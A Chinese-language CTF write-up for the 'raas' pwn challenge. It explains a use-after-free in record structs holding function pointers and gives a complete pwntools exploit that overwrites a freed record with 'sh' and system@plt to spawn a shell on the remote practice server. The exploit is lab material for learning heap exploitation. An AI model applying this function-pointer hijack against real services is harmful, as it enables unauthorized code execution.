raas

跟hitcon_training的uaf那题差不多，做的时候用system('sh')打本地发现没这条命令，打远程就可以...

do_del do_new

程序通过结构体存放printf和free函数的指针还有value值，程序没有对free,printf之前进行检查，所以存在uaf漏洞，由于系统有system函数所以我们可以修改do_del函数指向system('sh')

先

#hijack records[1]
new(0,1,1)
new(1,2,'aaaa',0x10)
delete(1)
delete(0)

再分配一个大小为0xc,type=2 的records控制records[1]结构体,然后改写它为'/sh\x00\x00',system_addr从而调用delete函数的时候执行system('sh')

gef➤  heap bins
───────────────────────[ Fastbins for arena 0xf772f780 ]───────────────────────  
Fastbins[idx=0, size=0x8]  ←  Chunk(addr=0x9ede008, size=0x10, flags=PREV_INUSE)  ←  Chunk(addr=0x9ede018, size=0x10, flags=PREV_INUSE) 
Fastbins[idx=1, size=0x10]  ←  Chunk(addr=0x9ede028, size=0x18, flags=PREV_INUSE) 
Fastbins[idx=2, size=0x18] 0x00
Fastbins[idx=3, size=0x20] 0x00
Fastbins[idx=4, size=0x28] 0x00
Fastbins[idx=5, size=0x30] 0x00
Fastbins[idx=6, size=0x38] 0x00

完整exp:

from pwn import *
context.log_level = 'debug'

elf = ELF('./raas')
#p = process('./raas',env = {"LD_PREOLOAD":"../libc-2.23.so.i386"})
p = remote('hackme.inndy.tw',7719)

def new(index,ty,value,length = 0):
    p.sendlineafter('Act > ','1')
    p.sendlineafter('Index > ',str(index))
    p.sendlineafter('Type > ',str(ty))
    if ty == 2:
        p.sendlineafter('Length > ',str(length))
    p.sendlineafter('Value > ',str(value))

def delete(index):
    p.sendlineafter('Act > ','2')
    p.sendlineafter('Index > ',str(index))

def show(index):
    p.sendlineafter('Act > ','3')
    p.sendlineafter('Index > ',str(index))

system_plt = elf.plt['system']

#hijack records[1]
new(0,1,1)
new(1,2,'aaaa',0x10)
delete(1)
delete(0)
#gdb.attach(p)
#system('sh\')
new(2,2, 'sh\x00\x00' + p32(system_plt),0xc)

delete(1)

p.interactive()